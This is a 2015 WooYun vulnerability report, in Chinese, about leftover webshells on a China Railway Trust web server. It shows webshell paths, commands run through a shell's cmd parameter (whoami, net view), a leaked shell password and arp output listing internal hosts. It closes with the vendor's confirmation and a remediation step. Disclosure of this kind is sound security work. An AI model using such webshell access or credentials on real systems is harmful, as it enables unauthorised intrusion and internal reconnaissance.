当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149661

漏洞标题:中铁信托某系统发现shell可威胁内网大量主机安全

相关厂商:中铁信托有限责任公司

漏洞作者: 路人甲

提交时间:2015-10-26 23:04

修复时间:2015-12-14 17:04

公开时间:2015-12-14 17:04

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

历史问题修复不当shell未清理干净

详细说明:

http://**.**.**.**:7001/etrading/

QQ截图20151026211714.jpg


发现的shell有如下:
http://**.**.**.**:7001/shell/no.jsp不知道密码

QQ截图20151026212036.jpg


http://**.**.**.**:7001/shell/shell.jsp(猜测是命令马)

QQ截图20151026212110.jpg


一试之下,发现果然

http://**.**.**.**:7001/shell/shell.jsp?cmd=whoami


QQ截图20151026212222.jpg


接下来好办了
沿路径逐层往下找到大马,获得密码wwwhk

QQ截图20151026212254.jpg

漏洞证明:

你懂的

QQ截图20151026212443.jpg


arp -a

接口: **.**.**.** --- 0xd Internet 地址 物理地址 类型 **.**.**.** 00-22-46-1b-25-60 动态 **.**.**.** 00-e0-81-d6-20-93 动态 **.**.**.** 00-e0-81-d6-1e-14 动态 **.**.**.** 00-e0-81-d6-1e-59 动态 **.**.**.**1 00-1d-92-d9-6b-c8 动态 **.**.**.** 6c-92-bf-00-fe-a8 动态 **.**.**.** 08-9e-01-6c-9a-f3 动态 **.**.**.** 00-30-48-cd-d9-85 动态 **.**.**.** 6c-92-bf-06-3c-d8 动态 **.**.**.** 50-e5-49-cf-63-26 动态 **.**.**.** 90-2b-34-b0-33-72 动态 **.**.**.** 68-f7-28-75-b0-8c 动态 **.**.**.** d4-3d-7e-fe-65-43 动态 **.**.**.** fc-aa-14-19-40-2e 动态 **.**.**.** 74-d4-35-4e-17-46 动态 **.**.**.** 44-8a-5b-2b-54-85 动态 **.**.**.** 00-21-cc-c5-92-17 动态 **.**.**.** 74-d4-35-f9-c3-ad 动态 **.**.**.** d8-cb-8a-94-bf-74 动态 **.**.**.** 44-8a-5b-5a-03-26 动态 **.**.**.** 90-2b-34-c5-65-32 动态 **.**.**.** 94-de-80-89-0f-6c 动态 **.**.**.** 50-e5-49-ae-c7-3b 动态 **.**.**.** 90-2b-34-c5-65-30 动态 **.**.**.** d4-3d-7e-07-54-98 动态 **.**.**.** 00-22-b0-e3-07-bd 动态 **.**.**.** 94-de-80-00-73-75 动态 **.**.**.** 28-d2-44-dc-67-a3 动态 **.**.**.** f4-6d-04-5a-c9-af 动态 **.**.**.** ff-ff-ff-ff-ff-ff 静态 **.**.**.** 01-00-5e-00-00-00 静态 **.**.**.** 01-00-5e-00-00-05 静态 **.**.**.** 01-00-5e-00-00-fb 静态 **.**.**.** 01-00-5e-00-01-18 静态 **.**.**.** 01-00-5e-00-01-3c 静态 **.**.**.** 01-00-5e-04-01-74 静态 **.**.**.** 01-00-5e-20-c3-73 静态 **.**.**.** 01-00-5e-24-64-77 静态 **.**.**.** 01-00-5e-25-3e-3a 静态 **.**.**.** 01-00-5e-38-72-77 静态 **.**.**.** 01-00-5e-40-39-75 静态 **.**.**.** 01-00-5e-48-90-b7 静态 **.**.**.** 01-00-5e-57-4b-71 静态 **.**.**.** 01-00-5e-6b-20-79 静态 **.**.**.** 01-00-5e-72-f4-b6 静态 **.**.**.** 01-00-5e-7a-ef-76 静态 **.**.**.** 01-00-5e-07-11-79 静态 **.**.**.** 01-00-5e-07-73-70 静态 **.**.**.** 01-00-5e-19-c4-01 静态 **.**.**.** 01-00-5e-25-96-0e 静态 **.**.**.** 01-00-5e-26-50-75 静态 **.**.**.** 01-00-5e-31-dd-72 静态 **.**.**.** 01-00-5e-6d-45-01 静态 **.**.**.** 01-00-5e-7e-fc-3c 静态 **.**.**.** 01-00-5e-0e-d7-3a 静态 **.**.**.** 01-00-5e-12-84-db 静态 **.**.**.** 01-00-5e-17-c6-01 静态 **.**.**.** 01-00-5e-24-b6-76 静态 **.**.**.** 01-00-5e-3c-ae-3b 静态 **.**.**.** 01-00-5e-52-91-77 静态 **.**.**.** 01-00-5e-56-36-74 静态 **.**.**.** 01-00-5e-56-3e-24 静态 **.**.**.** 01-00-5e-5d-50-76 静态 **.**.**.** 01-00-5e-63-6f-b6 静态 **.**.**.** 01-00-5e-20-41-31 静态 **.**.**.** 01-00-5e-26-2c-24 静态 **.**.**.** 01-00-5e-2b-4a-da 静态 **.**.**.** 01-00-5e-30-71-77 静态 **.**.**.** 01-00-5e-35-c8-1b 静态 **.**.**.** 01-00-5e-3c-95-b6 静态 **.**.**.** 01-00-5e-24-6c-b4 静态 **.**.**.** 01-00-5e-50-47-71 静态 **.**.**.** 01-00-5e-60-9a-1b 静态 **.**.**.** 01-00-5e-71-e7-74 静态 **.**.**.** 01-00-5e-11-a1-3c 静态 **.**.**.** 01-00-5e-34-5e-b7 静态 **.**.**.** 01-00-5e-22-f5-7b 静态 **.**.**.** 01-00-5e-43-16-b7 静态 **.**.**.** 01-00-5e-44-e7-71 静态 **.**.**.** 01-00-5e-52-6f-7d 静态 **.**.**.** 01-00-5e-7e-75-0e 静态 **.**.**.** 01-00-5e-24-0d-79 静态 **.**.**.** 01-00-5e-67-ee-79 静态 **.**.**.** 01-00-5e-72-bf-de 静态 **.**.**.** 01-00-5e-73-5a-71 静态 **.**.**.** 01-00-5e-31-3f-24 静态 **.**.**.** 01-00-5e-3d-5b-b6 静态 **.**.**.** 01-00-5e-3f-75-70 静态 **.**.**.** 01-00-5e-6d-51-31 静态 **.**.**.** 01-00-5e-6f-70-0c 静态 **.**.**.** 01-00-5e-76-c8-b6 静态 **.**.**.** 01-00-5e-07-cf-79 静态 **.**.**.** 01-00-5e-10-55-70 静态 **.**.**.** 01-00-5e-10-d3-0e 静态 **.**.**.** 01-00-5e-13-eb-7c 静态 **.**.**.** 01-00-5e-20-32-3b 静态 **.**.**.** 01-00-5e-20-50-31 静态 **.**.**.** 01-00-5e-28-f8-76 静态 **.**.**.** 01-00-5e-38-cf-01 静态 **.**.**.** 01-00-5e-3f-20-78 静态 **.**.**.** 01-00-5e-50-74-71 静态 **.**.**.** 01-00-5e-6b-56-01 静态 **.**.**.** 01-00-5e-73-7f-6f 静态 **.**.**.** 01-00-5e-01-0f-da 静态 **.**.**.** 01-00-5e-06-dd-ab 静态 **.**.**.** 01-00-5e-0b-ac-de 静态 **.**.**.** 01-00-5e-16-99-73 静态 **.**.**.** 01-00-5e-27-42-b7 静态 **.**.**.** 01-00-5e-39-41-7b 静态 **.**.**.** 01-00-5e-3b-a4-dc 静态 **.**.**.** 01-00-5e-4a-84-77 静态 **.**.**.** 01-00-5e-4d-f3-71 静态 **.**.**.** 01-00-5e-5a-17-65 静态 **.**.**.** 01-00-5e-6f-2a-78 静态 **.**.**.** 01-00-5e-05-5f-de 静态 **.**.**.** 01-00-5e-20-7d-7d 静态 **.**.**.** 01-00-5e-45-0c-b7 静态 **.**.**.** 01-00-5e-56-f2-b6 静态 **.**.**.** 01-00-5e-6e-4b-7d 静态 **.**.**.** 01-00-5e-0f-39-79 静态 **.**.**.** 01-00-5e-2c-38-6a 静态 **.**.**.** 01-00-5e-48-44-31 静态 **.**.**.** 01-00-5e-4e-eb-7c 静态 **.**.**.** 01-00-5e-51-1b-b7 静态 **.**.**.** 01-00-5e-55-1a-b7 静态 **.**.**.** 01-00-5e-58-b3-3c 静态 **.**.**.** 01-00-5e-7e-b8-6e 静态 **.**.**.** 01-00-5e-7f-2a-75 静态 **.**.**.** 01-00-5e-00-3e-24 静态 **.**.**.** 01-00-5e-0e-c2-01 静态 **.**.**.** 01-00-5e-1f-b4-6e 静态 **.**.**.** 01-00-5e-2c-75-7d 静态 **.**.**.** 01-00-5e-2c-8e-b4 静态 **.**.**.** 01-00-5e-31-48-da 静态 **.**.**.** 01-00-5e-49-51-65 静态 **.**.**.** 01-00-5e-57-49-7d 静态 **.**.**.** 01-00-5e-60-af-7b 静态 **.**.**.** 01-00-5e-66-4f-31 静态 **.**.**.** 01-00-5e-75-25-b6 静态 **.**.**.** 01-00-5e-07-6a-b4 静态 **.**.**.** 01-00-5e-19-87-b7 静态 **.**.**.** 01-00-5e-4a-cc-73 静态 **.**.**.** 01-00-5e-61-b6-3c 静态 **.**.**.** 01-00-5e-69-18-74 静态 **.**.**.** 01-00-5e-6f-8d-71 静态 **.**.**.** 01-00-5e-71-66-72 静态 **.**.**.** 01-00-5e-75-fb-76 静态 **.**.**.** 01-00-5e-01-64-24 静态 **.**.**.** 01-00-5e-05-86-db 静态 **.**.**.** 01-00-5e-31-ac-3b 静态 **.**.**.** 01-00-5e-36-76-71 静态 **.**.**.** 01-00-5e-38-ac-3b 静态 **.**.**.** 01-00-5e-3c-cf-01 静态 **.**.**.** 01-00-5e-5b-79-71 静态 **.**.**.** 01-00-5e-70-d7-de 静态 **.**.**.** 01-00-5e-76-aa-6f 静态 **.**.**.** 01-00-5e-78-2d-3a 静态 **.**.**.** 01-00-5e-00-51-01 静态 **.**.**.** 01-00-5e-07-6e-b4 静态 **.**.**.** 01-00-5e-0b-af-6f 静态 **.**.**.** 01-00-5e-51-9a-3d 静态 **.**.**.** 01-00-5e-7c-3e-3a 静态 **.**.**.** 01-00-5e-7c-44-78 静态 **.**.**.** 01-00-5e-14-34-74 静态 **.**.**.** 01-00-5e-28-5a-6e 静态 **.**.**.** 01-00-5e-42-2d-3a 静态 **.**.**.** 01-00-5e-42-b9-7b 静态 **.**.**.** 01-00-5e-5c-8a-b4 静态 **.**.**.** 01-00-5e-68-21-78 静态 **.**.**.** 01-00-5e-76-d3-3a 静态 **.**.**.** 01-00-5e-7b-0c-01 静态 **.**.**.** 01-00-5e-09-b9-3d 静态 **.**.**.** 01-00-5e-2b-2f-6f 静态 **.**.**.** 01-00-5e-36-84-db 静态 **.**.**.** 01-00-5e-5e-e4-79 静态 **.**.**.** 01-00-5e-60-9a-1b 静态 **.**.**.** 01-00-5e-64-d3-3a 静态 **.**.**.** 01-00-5e-0c-b8-1b 静态 **.**.**.** 01-00-5e-1f-68-f0 静态 **.**.**.** 01-00-5e-3b-ba-d2 静态 **.**.**.** 01-00-5e-58-19-74 静态 **.**.**.** 01-00-5e-27-80-db 静态 **.**.**.** 01-00-5e-2f-31-24 静态 **.**.**.** 01-00-5e-55-0e-da 静态 **.**.**.** 01-00-5e-62-a3-b7 静态 **.**.**.** 01-00-5e-6e-21-78 静态 **.**.**.** 01-00-5e-17-9b-0e 静态 **.**.**.** 01-00-5e-23-bf-75 静态 **.**.**.** 01-00-5e-32-14-da 静态 **.**.**.** 01-00-5e-53-80-71 静态 **.**.**.** 01-00-5e-5a-4d-71 静态 **.**.**.** 01-00-5e-00-63-77 静态 **.**.**.** 01-00-5e-10-dc-de 静态 **.**.**.** 01-00-5e-2b-40-71 静态 **.**.**.** 01-00-5e-7e-7d-77 静态 **.**.**.** 01-00-5e-21-99-7b 静态 **.**.**.** 01-00-5e-5b-61-71 静态 **.**.**.** 01-00-5e-60-83-77 静态 **.**.**.** 01-00-5e-21-68-72 静态 **.**.**.** 01-00-5e-22-e5-7c 静态 **.**.**.** 01-00-5e-3f-49-31 静态 **.**.**.** 01-00-5e-60-4a-31 静态 **.**.**.** 01-00-5e-76-94-0e 静态 **.**.**.** 01-00-5e-00-6c-b6 静态 **.**.**.** 01-00-5e-34-90-75 静态 **.**.**.** 01-00-5e-5e-7a-76 静态 **.**.**.** 01-00-5e-67-b2-6e 静态 **.**.**.** 01-00-5e-76-37-74 静态 **.**.**.** 01-00-5e-64-c5-01 静态 **.**.**.** 01-00-5e-76-91-3d 静态 **.**.**.** 01-00-5e-79-a3-77 静态 **.**.**.** 01-00-5e-05-03-3c 静态 **.**.**.** 01-00-5e-10-aa-dc 静态 **.**.**.** 01-00-5e-40-13-74 静态 **.**.**.** 01-00-5e-56-eb-70 静态 **.**.**.** 01-00-5e-5e-74-0e 静态 **.**.**.** 01-00-5e-78-59-71 静态 **.**.**.** 01-00-5e-24-98-6e 静态 **.**.**.** 01-00-5e-25-ae-3b 静态 **.**.**.** 01-00-5e-6b-00-08 静态 **.**.**.** 01-00-5e-7f-ff-fd 静态


http://**.**.**.**:7001/shell/shell.jsp?cmd=net view


QQ截图20151026212607.jpg


进大马看看

QQ截图20151026212640.jpg


QQ截图20151026213356.jpg


以上

修复方案:

删除shell,检查全站

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 17:03

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无

漏洞评价:

评价